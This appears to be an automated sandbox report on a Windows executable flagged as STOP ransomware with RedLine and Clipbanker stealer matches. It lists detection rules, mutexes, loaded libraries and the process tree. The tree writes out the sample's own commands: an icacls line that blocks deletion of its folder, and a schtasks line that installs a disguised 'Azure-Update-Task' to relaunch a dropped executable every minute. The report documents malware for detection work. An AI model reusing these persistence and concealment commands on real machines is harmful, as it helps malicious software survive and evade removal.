Source: 0000001E.00000002.2677244146.0000000000880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@45/1390@9/5

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00411900

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_044987C6 CreateToolhelp32Snapshot,Module32First,

0_2_044987C6

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_0040D240

Source: C:\Users\user\Desktop\R5391762lf.exe

File created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03

Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Admin	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsAutoStart	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsTask	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --ForNetRes	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsAutoStart	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsTask	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Task	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --AutoStart	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Service	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: X1P	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Admin	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: runas	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: x2Q	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: x*P	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: C:\Windows\	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: D:\Windows\	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: 7P	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: %username%	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: F:\	2_2_00419F90

Source: R5391762lf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\R5391762lf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\R5391762lf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\R5391762lf.exe

File read: C:\Users\user\Desktop\R5391762lf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rsaenh.dll	Jump to behavior
